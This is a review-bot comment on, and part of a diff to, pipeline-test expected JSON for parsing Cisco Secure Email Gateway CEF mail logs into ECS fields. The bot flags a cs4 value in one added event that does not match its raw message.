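Review bot: The `cs4_label` correction in `@@ -1537,7 +1695,7 @@` (`"ExternalMsgID cs4=''"` → `"ExternalMsgID"`) shows the empty `cs4=''` case is now split properly, but the hunk context does not include a `cs4` key, so whether an empty value now yields no `cs4` field or an empty string cannot be confirmed from this hunk. The outgoing-direction document added in the later hunk `@@ -1766,6 +1928,249 @@` carries `cs4=''` inside its own `message` yet has `"cs4": "AS8PR07MB7750BD7C13A560C44183D3158A5F2@AS8PR07MB7750.eurprd07.prod.outlook.com"`, a value that does not occur in the input sample visible here; that looks like a hand-edited rather than regenerated expected file. Regenerating the fixture with the pipeline test tooling would remove the inconsistency and keep the fixture from masking a regression in the `cs4` handling.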
@@ -1766,6 +1928,249 @@ "tags": [ "preserve_original_event" ] + }, + { + "@timestamp": "2024-07-04T06:21:54.000Z", + "cisco_secure_email_gateway": { + "log": { + "act": "DELIVERED", + "appliance": { + "product": "C100V Secure Email Gateway Virtual", + "vendor": "Cisco", + "version": "15.0.1-030" + }, + "category": { + "name": "consolidated_event" + }, + "cef_format_version": "0", + "cfp1_label": "SBRSScore", + "cs1": "DEFAULT", + "cs1_label": "MailPolicy", + "cs2": "not enabled", + "cs2_label": "SenderCountry", + "cs4": "AS8PR07MB7750BD7C13A560C44183D3158A5F2@AS8PR07MB7750.eurprd07.prod.outlook.com", + "cs4_label": "ExternalMsgID", + "data": { + "ip": "81.2.69.144" + }, + "device_direction": "outgoing", + "esa": { + "amp_verdict": "NOT_EVALUATED", + "as_verdict": "NOT_EVALUATED", + "attachment_details": "{'image.png': {'BodyScanner': {}}, 'GO EYEWEAR v4.pdf': {'BodyScanner': {}}}", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "MATCH", + "delivery_connection_id": "1980231", + "dlp_verdict": "NO_TRIGGER", + "friendly_from": "Carlos Alberto Cueto ", + "graymail_verdict": "NOT_EVALUATED", + "helo": { + "domain": "EUR05-DB8-obe.outbound.protection.outlook.com", + "ip": "1.128.3.4" + }, + "injection_connection_id": "6274404", + "mail_flow_policy": "RELAY", + "mf_verdict": "MATCH", + "msg_size": 2380198, + "outbreak_filter_verdict": "NOT_EVALUATED", + "sender_group": "RELAY_O365", + "tls": { + "in": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + }, + "out": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + } + }, + "url_details": "{'https://www.client.test/': {'WbrsScore': 3.0}, 'https://www.client.test/siente-la-inspiracion': {'WbrsScore': 3.0}, 'http://www.client.test/': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}, 'www.client.test': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}}" + }, + "event": { + "name": 
"Consolidated Log Event" + }, + "event_class_id": "ESA_CONSOLIDATED_LOG_EVENT", + "listener": { + "name": "MailFlow-Ext" + }, + "message": "CEF:0|Cisco|C100V Secure Email Gateway Virtual|15.0.1-030|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235AF15AF7E90350F1D-F01741F5D5BE ESAMID=17873886 ESAICID=6274404 ESADCID=1980231 ESAAMPVerdict=NOT_EVALUATED ESAASVerdict=NOT_EVALUATED ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH end=Thu Feb 29 13:24:30 2024 ESADLPVerdict=NO_TRIGGER dvc=81.2.69.144 ESAAttachmentDetails={'image.png': {'BodyScanner': {}}, 'GO EYEWEAR v4.pdf': {'BodyScanner': {}}} ESAFriendlyFrom=Carlos Alberto Cueto ESAGMVerdict=NOT_EVALUATED start=Thu Feb 29 13:24:27 2024 deviceOutboundInterface=MailFlow-Ext deviceDirection=1 ESAMailFlowPolicy=RELAY suser=lclient17@externos.client.test cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=not enabled ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='' ESAMsgSize=2380198 ESAOFVerdict=NOT_EVALUATED duser=teresa.faria@goeyeweargroup.com ESAHeloDomain=EUR05-DB8-obe.outbound.protection.outlook.com ESAHeloIP=1.128.3.4 cfp1Label=SBRSScore cfp1=not enabled shost=mail-db8eur05lp2105.outbound.protection.outlook.com ESASenderGroup=RELAY_O365 src=216.160.83.56 msg='Presupuesto Go Eyewear' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAURLDetails={'https://www.client.test/': {'WbrsScore': 3.0}, 'https://www.client.test/siente-la-inspiracion': {'WbrsScore': 3.0}, 'http://www.client.test/': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}, 'www.client.test': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}}" + } + }, + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "lclient17@externos.client.test" + ] + }, + "message_id": "17873886", + "subject": "Presupuesto Go Eyewear", + "to": { 
+ "address": [ + "teresa.faria@goeyeweargroup.com" + ] + } + }, + "event": { + "end": "2024-02-29T13:24:30.000Z", + "kind": "event", + "original": "<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Secure Email Gateway Virtual|15.0.1-030|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235AF15AF7E90350F1D-F01741F5D5BE ESAMID=17873886 ESAICID=6274404 ESADCID=1980231 ESAAMPVerdict=NOT_EVALUATED ESAASVerdict=NOT_EVALUATED ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH end=Thu Feb 29 13:24:30 2024 ESADLPVerdict=NO_TRIGGER dvc=81.2.69.144 ESAAttachmentDetails={'image.png': {'BodyScanner': {}}, 'GO EYEWEAR v4.pdf': {'BodyScanner': {}}} ESAFriendlyFrom=Carlos Alberto Cueto ESAGMVerdict=NOT_EVALUATED start=Thu Feb 29 13:24:27 2024 deviceOutboundInterface=MailFlow-Ext deviceDirection=1 ESAMailFlowPolicy=RELAY suser=lclient17@externos.client.test cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=not enabled ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='' ESAMsgSize=2380198 ESAOFVerdict=NOT_EVALUATED duser=teresa.faria@goeyeweargroup.com ESAHeloDomain=EUR05-DB8-obe.outbound.protection.outlook.com ESAHeloIP=1.128.3.4 cfp1Label=SBRSScore cfp1=not enabled shost=mail-db8eur05lp2105.outbound.protection.outlook.com ESASenderGroup=RELAY_O365 src=216.160.83.56 msg='Presupuesto Go Eyewear' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAURLDetails={'https://www.client.test/': {'WbrsScore': 3.0}, 'https://www.client.test/siente-la-inspiracion': {'WbrsScore': 3.0}, 'http://www.client.test/': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}, 'www.client.test': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}}", + "severity": "5", + "start": "2024-02-29T13:24:27.000Z", + "timezone": "UTC" + }, + "host": { + "id": "4235AF15AF7E90350F1D-F01741F5D5BE" + }, + "log": { + 
"syslog": { + "priority": 14 + } + }, + "related": { + "ip": [ + "1.128.3.4", + "81.2.69.144", + "216.160.83.56" + ] + }, + "source": { + "domain": "mail-db8eur05lp2105.outbound.protection.outlook.com", + "ip": "216.160.83.56" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-07-04T06:21:54.000Z", + "cisco_secure_email_gateway": { + "log": { + "act": "DELIVERED", + "appliance": { + "product": "C100V Secure Email Gateway Virtual", + "vendor": "Cisco", + "version": "15.0.1-030" + }, + "category": { + "name": "consolidated_event" + }, + "cef_format_version": "0", + "cfp1": 5.2, + "cfp1_label": "SBRSScore", + "cs1": "DEFAULT", + "cs1_label": "MailPolicy", + "cs2": "Germany", + "cs2_label": "SenderCountry", + "cs3": "N/A", + "cs3_label": "SDRThreatCategory", + "cs4": "588d90f8-92d8-45a9-bd6d-145f2d19c348@fra3s50mta17.xt.local", + "cs4_label": "ExternalMsgID", + "cs6": "Neutral", + "cs6_label": "SDRRepScore", + "data": { + "ip": "1.128.3.4" + }, + "device_direction": "incoming", + "esa": { + "amp_verdict": "SKIPPED", + "as_verdict": "BULK_MAIL", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "MATCH", + "delivery_connection_id": "1980232", + "dkim_verdict": "pass", + "dlp_verdict": "NOT_EVALUATED", + "dmarc_verdict": "pass", + "friendly_from": "\\\"Zander, Petra Petra.Zander at druseidt.de\\\" ", + "graymail_verdict": "POSITIVE", + "helo": { + "domain": "gr1.mta.exacttarget.com", + "ip": "89.160.20.128" + }, + "injection_connection_id": "6274403", + "mail_flow_policy": "ACCEPT", + "mf_verdict": "MATCH", + "msg_size": 53966, + "outbreak_filter_verdict": "NEGATIVE", + "reply_to": "Petra.Zander@druseidt.de", + "sdr_consolidated_domain_age": "30 days (or greater)", + "sender_group": "ACCEPTLIST", + "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com'}}", + "tls": { + "in": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": 
"Success", + "protocol": "TLSv1.2" + }, + "out": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + } + }, + "url_details": "{'www.druseidt.de': {'WbrsScore': 0.0}, 'http://www.druseidt.de': {'WbrsScore': 0.0}, 'www.client.test': {'WbrsScore': 3.0}, 'http://shop.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/shared_images/logo_mail.gif': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf0fbe79278be9131d8a5f9d077166c028a794c44100a7d1bd0cb97fa4ee801e339d368b418d777b258f4ccf219dcc927a': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/linkedin-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb47c7294d29dc300961df8ff20d96ef9d601738303abf9a32624db5bd04c6aa12133860be145983ffaf8aa1cf6ff6366': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/Logo+Matelec_color.png': {'WbrsScore': 3.0}, 'https://view.madrid.client.test/?qs=e2dc929383b279c71d8336589af96b30654ef13649d6d623810be8288cdb21419575cd44128cfcf836b2fb40daabe640b4f18b65eb0e1801a33efdd9ae76044b14467fe768e393e5c22e277ab02da833': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf9771d069b13360d9a133714361b81ec9465f9a84c46696d96e7d18f3487c0ff31e0212f1f6e849de9a3223dd9863f002cdeb13ba18b565e0': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf46beed6826b6ff7769db3cb1f6da294588712812697d57e094a03da3cfa9e305ba582571e734b2b82d4eaf467a5d7568': {'WbrsScore': 3.0}, 'http://www.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/vcf/pzander.vcf': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf2be2e6ccf73caccbf4f52fc62a17aa07d7d5e90a1be6105af4327cf8af71cc72e6d2ad74e3f2fc5599d3db7338ebc58d': {'WbrsScore': 3.0}, 'http://schemas.microsoft.com/office/2004/12/omml': {'WbrsScore': 9.0}, 
'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/YB-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/open.aspx?ffcb10-fec2177673660c79-fe6313707565057f7c1c-fe37117175640478731774-ff69167071-fe321571776c0678751076-ffce15&d=500013&bmt=0': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/instagram-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaff14314989caba41c1a5c77b84da37a17d2892f1926a349aa4bd652bf45762dd2598f1f4f1881bb05d8243a92a5494d96': {'WbrsScore': 3.0}, 'www.aepd.es': {'WbrsScore': 3.0}, 'www.listarobinson.es': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/enviar.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafa34c9728602b5f8b6e579445d6b89cf18e1f08e5e55db9abbe8d799119fbfed7b6cd873eec897ebeb562b5f69d3eea22': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafc5743c46f1be2c31fbcd171dd7a1c1f968ce7a15cdc8979f0f2fb71c3e2687f8c15807cecb222cb019a91c31d26f4490': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/facebook-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafebd823e115b97548dfb95b1c01a50ba6df8b8df68274be7e4a7dbf09471cde018af63e3eb3c7565a517f880127b24297': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/logo-client-png.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb400a6b6ceae5b73082235cabda876ece1ee91069f499e6e9d03be8953a9b0c08d64a08fa189b567bcc69f5a05bbc865': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/twitter+x.png': {'WbrsScore': 3.0}, 'http://druseidt.de/englisch/messen/messen.html': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafce9df9b86e788cce7959f98ce975c0dfc316987fe80c3c8dd6bf4adf9815d4297b04cdb2e0a678c7caf598e8cf298edb': {'WbrsScore': 3.0}}" + }, 
+ "event": { + "name": "Consolidated Log Event" + }, + "event_class_id": "ESA_CONSOLIDATED_LOG_EVENT", + "listener": { + "name": "MailFlow" + }, + "message": "CEF:0|Cisco|C100V Secure Email Gateway Virtual|15.0.1-030|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235AF15AF7E90350F1D-F01741F5D5BE ESAMID=17873887 ESAICID=6274403 ESADCID=1980232 ESAAMPVerdict=SKIPPED ESAASVerdict=BULK_MAIL ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH end=Thu Feb 29 13:24:31 2024 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED ESADMARCVerdict=pass dvc=1.128.3.4 ESAFriendlyFrom=\\\"Zander, Petra Petra.Zander at druseidt.de\\\" ESAGMVerdict=POSITIVE start=Thu Feb 29 13:24:22 2024 deviceInboundInterface=MailFlow deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=Germany ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='<588d90f8-92d8-45a9-bd6d-145f2d19c348@fra3s50mta17.xt.local>' ESAMsgSize=53966 ESAOFVerdict=NEGATIVE duser=matelec@client.test ESAHeloDomain=gr1.mta.exacttarget.com ESAHeloIP=89.160.20.128 ESAReplyTo=Petra.Zander@druseidt.de cfp1Label=SBRSScore cfp1=5.2 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com'}} shost=gr1.mta.exacttarget.com ESASenderGroup=ACCEPTLIST src=216.160.83.56 msg='AW: Important information for your participation as an exhibitor' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAURLDetails={'www.druseidt.de': {'WbrsScore': 0.0}, 'http://www.druseidt.de': {'WbrsScore': 0.0}, 'www.client.test': {'WbrsScore': 3.0}, 'http://shop.druseidt.de/': {'WbrsScore': 
0.0}, 'http://www.druseidt.de/shared_images/logo_mail.gif': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf0fbe79278be9131d8a5f9d077166c028a794c44100a7d1bd0cb97fa4ee801e339d368b418d777b258f4ccf219dcc927a': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/linkedin-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb47c7294d29dc300961df8ff20d96ef9d601738303abf9a32624db5bd04c6aa12133860be145983ffaf8aa1cf6ff6366': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/Logo+Matelec_color.png': {'WbrsScore': 3.0}, 'https://view.madrid.client.test/?qs=e2dc929383b279c71d8336589af96b30654ef13649d6d623810be8288cdb21419575cd44128cfcf836b2fb40daabe640b4f18b65eb0e1801a33efdd9ae76044b14467fe768e393e5c22e277ab02da833': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf9771d069b13360d9a133714361b81ec9465f9a84c46696d96e7d18f3487c0ff31e0212f1f6e849de9a3223dd9863f002cdeb13ba18b565e0': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf46beed6826b6ff7769db3cb1f6da294588712812697d57e094a03da3cfa9e305ba582571e734b2b82d4eaf467a5d7568': {'WbrsScore': 3.0}, 'http://www.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/vcf/pzander.vcf': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf2be2e6ccf73caccbf4f52fc62a17aa07d7d5e90a1be6105af4327cf8af71cc72e6d2ad74e3f2fc5599d3db7338ebc58d': {'WbrsScore': 3.0}, 'http://schemas.microsoft.com/office/2004/12/omml': {'WbrsScore': 9.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/YB-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/open.aspx?ffcb10-fec2177673660c79-fe6313707565057f7c1c-fe37117175640478731774-ff69167071-fe321571776c0678751076-ffce15&d=500013&bmt=0': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/instagram-news.png': {'WbrsScore': 3.0}, 
'https://click.madrid.client.test/?qs=b5641e4b32b2ddaff14314989caba41c1a5c77b84da37a17d2892f1926a349aa4bd652bf45762dd2598f1f4f1881bb05d8243a92a5494d96': {'WbrsScore': 3.0}, 'www.aepd.es': {'WbrsScore': 3.0}, 'www.listarobinson.es': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/enviar.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafa34c9728602b5f8b6e579445d6b89cf18e1f08e5e55db9abbe8d799119fbfed7b6cd873eec897ebeb562b5f69d3eea22': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafc5743c46f1be2c31fbcd171dd7a1c1f968ce7a15cdc8979f0f2fb71c3e2687f8c15807cecb222cb019a91c31d26f4490': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/facebook-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafebd823e115b97548dfb95b1c01a50ba6df8b8df68274be7e4a7dbf09471cde018af63e3eb3c7565a517f880127b24297': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/logo-client-png.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb400a6b6ceae5b73082235cabda876ece1ee91069f499e6e9d03be8953a9b0c08d64a08fa189b567bcc69f5a05bbc865': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/twitter+x.png': {'WbrsScore': 3.0}, 'http://druseidt.de/englisch/messen/messen.html': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafce9df9b86e788cce7959f98ce975c0dfc316987fe80c3c8dd6bf4adf9815d4297b04cdb2e0a678c7caf598e8cf298edb': {'WbrsScore': 3.0}}" + } + }, + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com" + ] + }, + "message_id": "17873887", + "subject": "AW: Important information for your participation as an exhibitor", + "to": { + "address": [ + "matelec@client.test" + ] + } + }, + "event": { + "end": "2024-02-29T13:24:31.000Z", 
+ "kind": "event", + "original": "<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Secure Email Gateway Virtual|15.0.1-030|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235AF15AF7E90350F1D-F01741F5D5BE ESAMID=17873887 ESAICID=6274403 ESADCID=1980232 ESAAMPVerdict=SKIPPED ESAASVerdict=BULK_MAIL ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH end=Thu Feb 29 13:24:31 2024 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED ESADMARCVerdict=pass dvc=1.128.3.4 ESAFriendlyFrom=\\\"Zander, Petra Petra.Zander at druseidt.de\\\" ESAGMVerdict=POSITIVE start=Thu Feb 29 13:24:22 2024 deviceInboundInterface=MailFlow deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=Germany ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='<588d90f8-92d8-45a9-bd6d-145f2d19c348@fra3s50mta17.xt.local>' ESAMsgSize=53966 ESAOFVerdict=NEGATIVE duser=matelec@client.test ESAHeloDomain=gr1.mta.exacttarget.com ESAHeloIP=89.160.20.128 ESAReplyTo=Petra.Zander@druseidt.de cfp1Label=SBRSScore cfp1=5.2 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com'}} shost=gr1.mta.exacttarget.com ESASenderGroup=ACCEPTLIST src=216.160.83.56 msg='AW: Important information for your participation as an exhibitor' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAURLDetails={'www.druseidt.de': {'WbrsScore': 0.0}, 'http://www.druseidt.de': {'WbrsScore': 0.0}, 'www.client.test': {'WbrsScore': 3.0}, 'http://shop.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/shared_images/logo_mail.gif': {'WbrsScore': 0.0}, 
'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf0fbe79278be9131d8a5f9d077166c028a794c44100a7d1bd0cb97fa4ee801e339d368b418d777b258f4ccf219dcc927a': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/linkedin-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb47c7294d29dc300961df8ff20d96ef9d601738303abf9a32624db5bd04c6aa12133860be145983ffaf8aa1cf6ff6366': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/Logo+Matelec_color.png': {'WbrsScore': 3.0}, 'https://view.madrid.client.test/?qs=e2dc929383b279c71d8336589af96b30654ef13649d6d623810be8288cdb21419575cd44128cfcf836b2fb40daabe640b4f18b65eb0e1801a33efdd9ae76044b14467fe768e393e5c22e277ab02da833': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf9771d069b13360d9a133714361b81ec9465f9a84c46696d96e7d18f3487c0ff31e0212f1f6e849de9a3223dd9863f002cdeb13ba18b565e0': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf46beed6826b6ff7769db3cb1f6da294588712812697d57e094a03da3cfa9e305ba582571e734b2b82d4eaf467a5d7568': {'WbrsScore': 3.0}, 'http://www.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/vcf/pzander.vcf': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf2be2e6ccf73caccbf4f52fc62a17aa07d7d5e90a1be6105af4327cf8af71cc72e6d2ad74e3f2fc5599d3db7338ebc58d': {'WbrsScore': 3.0}, 'http://schemas.microsoft.com/office/2004/12/omml': {'WbrsScore': 9.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/YB-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/open.aspx?ffcb10-fec2177673660c79-fe6313707565057f7c1c-fe37117175640478731774-ff69167071-fe321571776c0678751076-ffce15&d=500013&bmt=0': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/instagram-news.png': {'WbrsScore': 3.0}, 
'https://click.madrid.client.test/?qs=b5641e4b32b2ddaff14314989caba41c1a5c77b84da37a17d2892f1926a349aa4bd652bf45762dd2598f1f4f1881bb05d8243a92a5494d96': {'WbrsScore': 3.0}, 'www.aepd.es': {'WbrsScore': 3.0}, 'www.listarobinson.es': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/enviar.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafa34c9728602b5f8b6e579445d6b89cf18e1f08e5e55db9abbe8d799119fbfed7b6cd873eec897ebeb562b5f69d3eea22': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafc5743c46f1be2c31fbcd171dd7a1c1f968ce7a15cdc8979f0f2fb71c3e2687f8c15807cecb222cb019a91c31d26f4490': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/facebook-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafebd823e115b97548dfb95b1c01a50ba6df8b8df68274be7e4a7dbf09471cde018af63e3eb3c7565a517f880127b24297': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/logo-client-png.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb400a6b6ceae5b73082235cabda876ece1ee91069f499e6e9d03be8953a9b0c08d64a08fa189b567bcc69f5a05bbc865': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/twitter+x.png': {'WbrsScore': 3.0}, 'http://druseidt.de/englisch/messen/messen.html': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafce9df9b86e788cce7959f98ce975c0dfc316987fe80c3c8dd6bf4adf9815d4297b04cdb2e0a678c7caf598e8cf298edb': {'WbrsScore': 3.0}}", + "severity": "5", + "start": "2024-02-29T13:24:22.000Z", + "timezone": "UTC" + }, + "host": { + "id": "4235AF15AF7E90350F1D-F01741F5D5BE" + }, + "log": { + "syslog": { + "priority": 14 + } + }, + "related": { + "ip": [ + "89.160.20.128", + "1.128.3.4", + "216.160.83.56" + ] + }, + "source": { + "domain": "gr1.mta.exacttarget.com", + "ip": "216.160.83.56" + }, + "tags": [ + 
"preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-content-scanner.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-content-scanner.log-expected.json index 48672e6b6a1..318e045d04f 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-content-scanner.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-content-scanner.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -34,7 +34,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-error.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-error.log-expected.json index 